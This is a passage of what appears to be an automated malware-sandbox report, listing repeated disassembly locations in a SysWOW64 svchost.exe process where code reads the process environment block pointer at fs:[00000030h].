            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B035C mov eax, dword ptr fs:[00000030h] 1_2_035B035C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035FA352 mov eax, dword ptr fs:[00000030h] 1_2_035FA352
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D8350 mov ecx, dword ptr fs:[00000030h] 1_2_035D8350
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B2349 mov eax, dword ptr fs:[00000030h] 1_2_035B2349
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D437C mov eax, dword ptr fs:[00000030h] 1_2_035D437C
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C310 mov ecx, dword ptr fs:[00000030h] 1_2_0352C310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03550310 mov ecx, dword ptr fs:[00000030h] 1_2_03550310
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356A30B mov eax, dword ptr fs:[00000030h] 1_2_0356A30B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov ecx, dword ptr fs:[00000030h] 1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DE3DB mov eax, dword ptr fs:[00000030h] 1_2_035DE3DB
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h] 1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035D43D4 mov eax, dword ptr fs:[00000030h] 1_2_035D43D4
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EC3CD mov eax, dword ptr fs:[00000030h] 1_2_035EC3CD
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A3C0 mov eax, dword ptr fs:[00000030h] 1_2_0353A3C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035383C0 mov eax, dword ptr fs:[00000030h] 1_2_035383C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B63C0 mov eax, dword ptr fs:[00000030h] 1_2_035B63C0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0354E3F0 mov eax, dword ptr fs:[00000030h] 1_2_0354E3F0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035663FF mov eax, dword ptr fs:[00000030h] 1_2_035663FF
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035403E9 mov eax, dword ptr fs:[00000030h] 1_2_035403E9
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03528397 mov eax, dword ptr fs:[00000030h] 1_2_03528397
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352E388 mov eax, dword ptr fs:[00000030h] 1_2_0352E388
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h] 1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0355438F mov eax, dword ptr fs:[00000030h] 1_2_0355438F
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352A250 mov eax, dword ptr fs:[00000030h] 1_2_0352A250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536259 mov eax, dword ptr fs:[00000030h] 1_2_03536259
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h] 1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035EA250 mov eax, dword ptr fs:[00000030h] 1_2_035EA250
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B8243 mov eax, dword ptr fs:[00000030h] 1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B8243 mov ecx, dword ptr fs:[00000030h] 1_2_035B8243
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035E0274 mov eax, dword ptr fs:[00000030h] 1_2_035E0274
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03534260 mov eax, dword ptr fs:[00000030h] 1_2_03534260
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352826B mov eax, dword ptr fs:[00000030h] 1_2_0352826B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352823B mov eax, dword ptr fs:[00000030h] 1_2_0352823B
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0353A2C3 mov eax, dword ptr fs:[00000030h] 1_2_0353A2C3
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402E1 mov eax, dword ptr fs:[00000030h] 1_2_035402E1
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h] 1_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0356E284 mov eax, dword ptr fs:[00000030h] 1_2_0356E284
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035B0283 mov eax, dword ptr fs:[00000030h] 1_2_035B0283
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h] 1_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035402A0 mov eax, dword ptr fs:[00000030h] 1_2_035402A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov ecx, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C62A0 mov eax, dword ptr fs:[00000030h] 1_2_035C62A0
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0352C156 mov eax, dword ptr fs:[00000030h] 1_2_0352C156
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C8158 mov eax, dword ptr fs:[00000030h] 1_2_035C8158
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h] 1_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03536154 mov eax, dword ptr fs:[00000030h] 1_2_03536154
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov ecx, dword ptr fs:[00000030h] 1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035C4144 mov eax, dword ptr fs:[00000030h] 1_2_035C4144
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov ecx, dword ptr fs:[00000030h] 1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_035DA118 mov eax, dword ptr fs:[00000030h] 1_2_035DA118
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F0115 mov eax, dword ptr fs:[00000030h]1_2_035F0115
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov eax, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035DE10E mov ecx, dword ptr fs:[00000030h]1_2_035DE10E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560124 mov eax, dword ptr fs:[00000030h]1_2_03560124
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_036061E5 mov eax, dword ptr fs:[00000030h]1_2_036061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AE1D0 mov eax, dword ptr fs:[00000030h]1_2_035AE1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]1_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F61C3 mov eax, dword ptr fs:[00000030h]1_2_035F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035601F8 mov eax, dword ptr fs:[00000030h]1_2_035601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B019F mov eax, dword ptr fs:[00000030h]1_2_035B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A197 mov eax, dword ptr fs:[00000030h]1_2_0352A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03570185 mov eax, dword ptr fs:[00000030h]1_2_03570185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]1_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035EC188 mov eax, dword ptr fs:[00000030h]1_2_035EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]1_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D4180 mov eax, dword ptr fs:[00000030h]1_2_035D4180
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03532050 mov eax, dword ptr fs:[00000030h]1_2_03532050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B6050 mov eax, dword ptr fs:[00000030h]1_2_035B6050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0355C073 mov eax, dword ptr fs:[00000030h]1_2_0355C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0354E016 mov eax, dword ptr fs:[00000030h]1_2_0354E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4000 mov ecx, dword ptr fs:[00000030h]1_2_035B4000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D2000 mov eax, dword ptr fs:[00000030h]1_2_035D2000
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C6030 mov eax, dword ptr fs:[00000030h]1_2_035C6030
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A020 mov eax, dword ptr fs:[00000030h]1_2_0352A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C020 mov eax, dword ptr fs:[00000030h]1_2_0352C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B20DE mov eax, dword ptr fs:[00000030h]1_2_035B20DE
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352C0F0 mov eax, dword ptr fs:[00000030h]1_2_0352C0F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035720F0 mov ecx, dword ptr fs:[00000030h]1_2_035720F0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0352A0E3 mov ecx, dword ptr fs:[00000030h]1_2_0352A0E3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035380E9 mov eax, dword ptr fs:[00000030h]1_2_035380E9
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B60E0 mov eax, dword ptr fs:[00000030h]1_2_035B60E0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353208A mov eax, dword ptr fs:[00000030h]1_2_0353208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F60B8 mov eax, dword ptr fs:[00000030h]1_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035F60B8 mov ecx, dword ptr fs:[00000030h]1_2_035F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035C80A8 mov eax, dword ptr fs:[00000030h]1_2_035C80A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530750 mov eax, dword ptr fs:[00000030h]1_2_03530750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE75D mov eax, dword ptr fs:[00000030h]1_2_035BE75D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]1_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03572750 mov eax, dword ptr fs:[00000030h]1_2_03572750
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B4755 mov eax, dword ptr fs:[00000030h]1_2_035B4755
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov esi, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356674D mov eax, dword ptr fs:[00000030h]1_2_0356674D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03538770 mov eax, dword ptr fs:[00000030h]1_2_03538770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03540770 mov eax, dword ptr fs:[00000030h]1_2_03540770
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03530710 mov eax, dword ptr fs:[00000030h]1_2_03530710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03560710 mov eax, dword ptr fs:[00000030h]1_2_03560710
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C700 mov eax, dword ptr fs:[00000030h]1_2_0356C700
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov ecx, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356273C mov eax, dword ptr fs:[00000030h]1_2_0356273C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035AC730 mov eax, dword ptr fs:[00000030h]1_2_035AC730
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]1_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0356C720 mov eax, dword ptr fs:[00000030h]1_2_0356C720
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0353C7C0 mov eax, dword ptr fs:[00000030h]1_2_0353C7C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035B07C3 mov eax, dword ptr fs:[00000030h]1_2_035B07C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]1_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035347FB mov eax, dword ptr fs:[00000030h]1_2_035347FB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035527ED mov eax, dword ptr fs:[00000030h]1_2_035527ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035BE7E1 mov eax, dword ptr fs:[00000030h]1_2_035BE7E1
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035D678E mov eax, dword ptr fs:[00000030h]1_2_035D678E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_035307AF mov eax, dword ptr fs:[00000030h]1_2_035307AF
